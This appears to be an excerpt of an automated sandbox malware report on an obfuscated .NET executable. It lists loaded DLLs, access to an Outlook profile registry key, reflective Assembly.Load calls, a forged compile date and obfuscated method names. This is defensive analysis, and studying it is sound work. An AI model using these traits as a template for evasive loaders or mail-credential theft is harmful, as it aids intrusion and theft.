                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: HQYI.pdbSHA256 source: 299371485_14108825808_1736351479899.exe
                    Source: Binary string: HQYI.pdb source: 299371485_14108825808_1736351479899.exe

                    Data Obfuscation

Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.cs | .Net Code: tMj9M9Iyv6 System.Reflection.Assembly.Load(byte[])
Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.cs | .Net Code: tMj9M9Iyv6 System.Reflection.Assembly.Load(byte[])
Source: 0.2.299371485_14108825808_1736351479899.exe.4ee0000.5.raw.unpack, MainForm.cs | .Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.299371485_14108825808_1736351479899.exe.37a99c8.2.raw.unpack, MainForm.cs | .Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.cs | .Net Code: tMj9M9Iyv6 System.Reflection.Assembly.Load(byte[])
Source: 299371485_14108825808_1736351479899.exe | Static PE information: 0xFBDE30D5 [Tue Nov 27 21:38:29 2103 UTC]
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 0_2_0272F210 push esi; retn 0004h | 0_2_0272F21A
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 0_2_0272F21F push edi; retn 0004h | 0_2_0272F22A
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 0_2_0272F188 push ebx; retn 0004h | 0_2_0272F1A2
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 0_2_0D751B1F push esp; retn 5504h | 0_2_0D751B96
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F0840C push es; retf F080h | 6_2_06F08440
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F01580 push es; iretd | 6_2_06F01604
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F0C1BF push es; ret | 6_2_06F0C1C0
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F088DF push es; ret | 6_2_06F088E0
Source: 299371485_14108825808_1736351479899.exe | Static PE information: section name: .text entropy: 7.7464499069030195
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, qelLwRPCPsGUs6jdyY.csHigh entropy of concatenated method names: 'C4JlbnANLt', 'NEvl8YuQcg', 'NN6lCuaIGq', 'MBClKTQfSr', 'heTlBYamwi', 'CwvlISDKoB', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, ggXPZ5pdN41pIJs1V3.csHigh entropy of concatenated method names: 'ilnCo2TpYw', 'jQKCNctpwn', 'g3fCdhQ4Js', 'ToString', 'uj3C4FpJJS', 'SZ2C58A6MS', 'b5LeipymTSahZpCWtVI', 'a1NBaSy4kxFCjHZl6ot', 'qFDxGAyJuBOXAU3uP6S', 'bQbx4HyXSVlTNcxgB9W'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, KiBPZRUmpULxGIDG71.csHigh entropy of concatenated method names: 'vTOKf63TLf', 'Ck4K6KTSyh', 'mpoKMCphDT', 'QUvKvcuiCl', 'sWqKJLKTUR', 'AVkKEThFF6', 'qKhKO19hPd', 'PliKy3LrZg', 'DbjK2KXapj', 'UptKToYVXa'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, vbF4dwbDYXd1pm0UND.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ARs7Zueo2T', 'fg37PlI7bQ', 'L3e7zbBF6O', 'tWGFrMcMJh', 'HfDFjU0QJp', 'OWqF7ccZXX', 'yYaFF3xJ4A', 'KQhgDkf0myA5Z1vVEcy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ad8t06TsdlZPlGJflu.csHigh entropy of concatenated method names: 'WUa8J9DTew', 'wye8OiWCKY', 'NGlbSsUNHx', 'gWlbuiODZG', 'CyHbXdruHc', 'Gfkbp0H53H', 'NTYbW5uH0F', 'zAhbmigu3E', 'JTvbUr7yE6', 'f39biBHtB9'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, nJfbfko7qhviuIACOm.csHigh entropy of concatenated method names: 'ToString', 'nUvQ0x5mpP', 'yo1QcUWHr2', 'hI2QSgYY72', 'XCdQu7q9R5', 'crEQXSZicJ', 'A2eQpoBqck', 'GK2QW1LDF5', 'dHBQmj1QsF', 'veDQUTGIxR'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ru23Huyb8mQLjC7BwH.csHigh entropy of concatenated method names: 'qKNqtcoNRU', 'tMRqh655Hk', 'cydqohwEm1', 'lRmqNULURh', 'YdiqdpFKUc', 'YtEq4FoWAb', 'HCMq52QiOf', 'uP5qatB1SB', 'VRjqZoTOF2', 'EtZqPV98Aq'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.csHigh entropy of concatenated method names: 'nNWF1G7MHU', 'yIKFGqwVsM', 'gJUFqwRMVG', 'SoqFbPyRkr', 'dIhF8RGr9t', 'mmlFCbEW2s', 'kfSFK0ejw5', 'xjaFI39hgS', 'iPqFwPHaio', 'nLsFns5SaE'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, UQ2KwGjrcRdMFjeybgG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qqCl0TGnC8', 'QRblDiKoFe', 'YrClL35cag', 'o4xltb0hSF', 'uJ1lhHiIN9', 'JcyloCa4T2', 'lK8lNLhq2E'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, NvlJnjtLs8bdgXBD99.csHigh entropy of concatenated method names: 'CUDeimJgTS', 'qh4eD0ZMSv', 'uAoet9Dgbd', 'KUMehq5Pgl', 'b1GecRRf2P', 'cIAeSuTxAi', 'GdEeuXwLNU', 'qHBeXjJMf9', 'cKcepgQvyC', 'VeDeWRNpAd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, vFBqrTW7LF9gFQ3SS9.csHigh entropy of concatenated method names: 'YusKGfnxTw', 'mFNKbjNWGJ', 'v0kKCBJvHc', 'kTBCPS9JUJ', 'naUCziBAwT', 'AhEKr6FPyy', 'UJ9KjNWpGN', 'uaUK7eDKgu', 'jZxKFcfu0H', 'oiKK9Fo6dd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, w4aIYZZAxAL81mU4Pf.csHigh entropy of concatenated method names: 'tbsBYQAIjb', 'Qj8BcmckrZ', 'ci1BSALIuO', 'vq8BuU9VUD', 'iQWBXj6b9E', 'wigBpJdmud', 'xDwBWsIw0b', 'gveBmn9kue', 'F76BU0DIOI', 'GF1Bi71EUZ'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, I7L8C6N1ebf5t9UBNB.csHigh entropy of concatenated method names: 'GhwAnyibkG', 'qKtAsiCy08', 'ToString', 'Q4JAGOYMHa', 'ydLAqEDiSj', 'V73Ab35N3p', 'tiYA8kcdEJ', 'KWeACNh0Vu', 'NZpAK75mWm', 'i0OAIG4CMK'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, qFpaCg4OeA9gyeZYvB.csHigh entropy of concatenated method names: 'cRMAa0XpJN', 'FimAPvP2jr', 'FEnxroRaLi', 'D1YxjmDc24', 'D1IA0jrwGL', 'kggADFGiWg', 'PHEALmoOf0', 'HYFAtRYgdn', 'NOCAhQxFUg', 'NT7Aok0MCh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, XEbj01c6HjltfqTAYO.csHigh entropy of concatenated method names: 'R6HG07yaTT7p1wrHxiQ', 'jWnbt4yFKwV4f4O8La3', 'Lb4CxmI65B', 'dS1CBVcFBL', 'fCYClqspom', 'k91DwNyYu1JU3W8CJkA', 'enG5bAyRxepn5Q9TkCu'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, a6ErcFYOWqRCf0yytN.csHigh entropy of concatenated method names: 'qd2C1YF2aN', 'CHsCqUSZab', 'YBpC8bDBWf', 'IT6CKBNg4O', 'l0nCIjIysJ', 'WOk8dqRp0M', 'fwx84ULr0r', 'Ryy85rxqRc', 'X8I8aXN9dA', 'eNA8ZJh3yl'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, VTwGxuj9BXOw3aUhmTr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kdVVB6UQ1d', 'xNmVlKFttY', 'f95VgPgmlT', 'yCXVV9C06G', 'f6jV3nqVgZ', 'jKMVHAUR3I', 'FvUVR1pUNb'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Xps7qRzTcm6j2O5EgP.csHigh entropy of concatenated method names: 'fbFlEUaWEi', 'm87lydFlV7', 'dPbl2cJ0k6', 'vMolY90eWD', 'b58lcEeXVy', 'z0FluM8CNn', 'bE3lXil51Y', 'borlRHJdHa', 'gySlf1nh3m', 'r1Vl6mHovj'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, GmQF5c96kjSSXmTedq.csHigh entropy of concatenated method names: 'v0tjKu23Hu', 'g8mjIQLjC7', 'NkhjnIBVLA', 'i5ejsCvd8t', 'fJfjelur6E', 'acFjQOWqRC', 'wjMxeVddQy3O8n4b3E', 'i9JQ60n6NPoaj2Jir7', 'O6bjjELi8v', 'K1OjFPPdsk'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, nrtLcTjjDPGqy3J5J8r.csHigh entropy of concatenated method names: 'zSclPJQaLc', 'LnKlznPo8e', 'y5pgrn35kf', 'stNgjlSHee', 'W59g79iVOf', 'TjVgFqUOmi', 'qqDg9UkcZ1', 'eU9g1kJFbd', 'hFrgG8xD90', 'fmwgqL9dx5'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, VushkvqOit4FjNAy9I.csHigh entropy of concatenated method names: 'Dispose', 'EuIjZeQ4LD', 'FyC7codZQ0', 'hFlOXJLFwU', 'VFyjPGK9yc', 'pqVjzNt61m', 'ProcessDialogKey', 'rMH7r4aIYZ', 'qxA7jL81mU', 'VPf77AelLw'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Xhifmp5Im2uIeQ4LD5.csHigh entropy of concatenated method names: 'VLhBeDH9r4', 'PpyBAd6Ll1', 'LFEBBnyoGc', 'EECBg9iGtG', 'LxtB3R6WMg', 'REgBRqM5SU', 'Dispose', 'UwOxGpbd10', 'rg3xqEOBwh', 'BS8xbboLWy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, ruDEOU2khIBVLAC5eC.csHigh entropy of concatenated method names: 'KZ8bvO40Wr', 'sQEbEXJDhl', 'ffqbyfoUww', 'eKDb2Q4MtS', 'O2FbebY4uW', 'wxdbQHmMpS', 'zOBbAUQdbj', 'BbIbx5nb5X', 'lbMbBl5DUD', 'ot8bllxglN'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, cbbtMY7GD7d1iUYhAX.csHigh entropy of concatenated method names: 'q5GMGslJM', 'EQyvUl5iu', 'CoDE5XOKS', 'b1COhJQJH', 'naI2m2o8C', 'A1hTPLsN0', 'NETVDVLfcWVTSqcl8g', 'nfmL13G8xZw2qfad3n', 'V6TxipDOr', 'oR1lhV4Dv'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, UIgDiRLwSiBdvbIDpp.csHigh entropy of concatenated method names: 'lrPky6NOEY', 'nYvk27DFfA', 'fxnkY9KjQu', 'eYYkcs2k12', 'fEAkuyg4Ey', 'exnkXUy3PT', 'J97kWEtmIx', 'nWtkmoj9mT', 't9mkic3TWQ', 'FVdk0RySk6'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, qelLwRPCPsGUs6jdyY.csHigh entropy of concatenated method names: 'C4JlbnANLt', 'NEvl8YuQcg', 'NN6lCuaIGq', 'MBClKTQfSr', 'heTlBYamwi', 'CwvlISDKoB', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, ggXPZ5pdN41pIJs1V3.csHigh entropy of concatenated method names: 'ilnCo2TpYw', 'jQKCNctpwn', 'g3fCdhQ4Js', 'ToString', 'uj3C4FpJJS', 'SZ2C58A6MS', 'b5LeipymTSahZpCWtVI', 'a1NBaSy4kxFCjHZl6ot', 'qFDxGAyJuBOXAU3uP6S', 'bQbx4HyXSVlTNcxgB9W'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, KiBPZRUmpULxGIDG71.csHigh entropy of concatenated method names: 'vTOKf63TLf', 'Ck4K6KTSyh', 'mpoKMCphDT', 'QUvKvcuiCl', 'sWqKJLKTUR', 'AVkKEThFF6', 'qKhKO19hPd', 'PliKy3LrZg', 'DbjK2KXapj', 'UptKToYVXa'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, vbF4dwbDYXd1pm0UND.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ARs7Zueo2T', 'fg37PlI7bQ', 'L3e7zbBF6O', 'tWGFrMcMJh', 'HfDFjU0QJp', 'OWqF7ccZXX', 'yYaFF3xJ4A', 'KQhgDkf0myA5Z1vVEcy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ad8t06TsdlZPlGJflu.csHigh entropy of concatenated method names: 'WUa8J9DTew', 'wye8OiWCKY', 'NGlbSsUNHx', 'gWlbuiODZG', 'CyHbXdruHc', 'Gfkbp0H53H', 'NTYbW5uH0F', 'zAhbmigu3E', 'JTvbUr7yE6', 'f39biBHtB9'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, nJfbfko7qhviuIACOm.csHigh entropy of concatenated method names: 'ToString', 'nUvQ0x5mpP', 'yo1QcUWHr2', 'hI2QSgYY72', 'XCdQu7q9R5', 'crEQXSZicJ', 'A2eQpoBqck', 'GK2QW1LDF5', 'dHBQmj1QsF', 'veDQUTGIxR'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ru23Huyb8mQLjC7BwH.csHigh entropy of concatenated method names: 'qKNqtcoNRU', 'tMRqh655Hk', 'cydqohwEm1', 'lRmqNULURh', 'YdiqdpFKUc', 'YtEq4FoWAb', 'HCMq52QiOf', 'uP5qatB1SB', 'VRjqZoTOF2', 'EtZqPV98Aq'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.csHigh entropy of concatenated method names: 'nNWF1G7MHU', 'yIKFGqwVsM', 'gJUFqwRMVG', 'SoqFbPyRkr', 'dIhF8RGr9t', 'mmlFCbEW2s', 'kfSFK0ejw5', 'xjaFI39hgS', 'iPqFwPHaio', 'nLsFns5SaE'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, UQ2KwGjrcRdMFjeybgG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qqCl0TGnC8', 'QRblDiKoFe', 'YrClL35cag', 'o4xltb0hSF', 'uJ1lhHiIN9', 'JcyloCa4T2', 'lK8lNLhq2E'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, NvlJnjtLs8bdgXBD99.csHigh entropy of concatenated method names: 'CUDeimJgTS', 'qh4eD0ZMSv', 'uAoet9Dgbd', 'KUMehq5Pgl', 'b1GecRRf2P', 'cIAeSuTxAi', 'GdEeuXwLNU', 'qHBeXjJMf9', 'cKcepgQvyC', 'VeDeWRNpAd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, vFBqrTW7LF9gFQ3SS9.csHigh entropy of concatenated method names: 'YusKGfnxTw', 'mFNKbjNWGJ', 'v0kKCBJvHc', 'kTBCPS9JUJ', 'naUCziBAwT', 'AhEKr6FPyy', 'UJ9KjNWpGN', 'uaUK7eDKgu', 'jZxKFcfu0H', 'oiKK9Fo6dd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, w4aIYZZAxAL81mU4Pf.csHigh entropy of concatenated method names: 'tbsBYQAIjb', 'Qj8BcmckrZ', 'ci1BSALIuO', 'vq8BuU9VUD', 'iQWBXj6b9E', 'wigBpJdmud', 'xDwBWsIw0b', 'gveBmn9kue', 'F76BU0DIOI', 'GF1Bi71EUZ'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, I7L8C6N1ebf5t9UBNB.csHigh entropy of concatenated method names: 'GhwAnyibkG', 'qKtAsiCy08', 'ToString', 'Q4JAGOYMHa', 'ydLAqEDiSj', 'V73Ab35N3p', 'tiYA8kcdEJ', 'KWeACNh0Vu', 'NZpAK75mWm', 'i0OAIG4CMK'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, qFpaCg4OeA9gyeZYvB.csHigh entropy of concatenated method names: 'cRMAa0XpJN', 'FimAPvP2jr', 'FEnxroRaLi', 'D1YxjmDc24', 'D1IA0jrwGL', 'kggADFGiWg', 'PHEALmoOf0', 'HYFAtRYgdn', 'NOCAhQxFUg', 'NT7Aok0MCh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, XEbj01c6HjltfqTAYO.csHigh entropy of concatenated method names: 'R6HG07yaTT7p1wrHxiQ', 'jWnbt4yFKwV4f4O8La3', 'Lb4CxmI65B', 'dS1CBVcFBL', 'fCYClqspom', 'k91DwNyYu1JU3W8CJkA', 'enG5bAyRxepn5Q9TkCu'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, a6ErcFYOWqRCf0yytN.csHigh entropy of concatenated method names: 'qd2C1YF2aN', 'CHsCqUSZab', 'YBpC8bDBWf', 'IT6CKBNg4O', 'l0nCIjIysJ', 'WOk8dqRp0M', 'fwx84ULr0r', 'Ryy85rxqRc', 'X8I8aXN9dA', 'eNA8ZJh3yl'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, VTwGxuj9BXOw3aUhmTr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kdVVB6UQ1d', 'xNmVlKFttY', 'f95VgPgmlT', 'yCXVV9C06G', 'f6jV3nqVgZ', 'jKMVHAUR3I', 'FvUVR1pUNb'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Xps7qRzTcm6j2O5EgP.csHigh entropy of concatenated method names: 'fbFlEUaWEi', 'm87lydFlV7', 'dPbl2cJ0k6', 'vMolY90eWD', 'b58lcEeXVy', 'z0FluM8CNn', 'bE3lXil51Y', 'borlRHJdHa', 'gySlf1nh3m', 'r1Vl6mHovj'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, GmQF5c96kjSSXmTedq.csHigh entropy of concatenated method names: 'v0tjKu23Hu', 'g8mjIQLjC7', 'NkhjnIBVLA', 'i5ejsCvd8t', 'fJfjelur6E', 'acFjQOWqRC', 'wjMxeVddQy3O8n4b3E', 'i9JQ60n6NPoaj2Jir7', 'O6bjjELi8v', 'K1OjFPPdsk'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, nrtLcTjjDPGqy3J5J8r.csHigh entropy of concatenated method names: 'zSclPJQaLc', 'LnKlznPo8e', 'y5pgrn35kf', 'stNgjlSHee', 'W59g79iVOf', 'TjVgFqUOmi', 'qqDg9UkcZ1', 'eU9g1kJFbd', 'hFrgG8xD90', 'fmwgqL9dx5'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, VushkvqOit4FjNAy9I.csHigh entropy of concatenated method names: 'Dispose', 'EuIjZeQ4LD', 'FyC7codZQ0', 'hFlOXJLFwU', 'VFyjPGK9yc', 'pqVjzNt61m', 'ProcessDialogKey', 'rMH7r4aIYZ', 'qxA7jL81mU', 'VPf77AelLw'
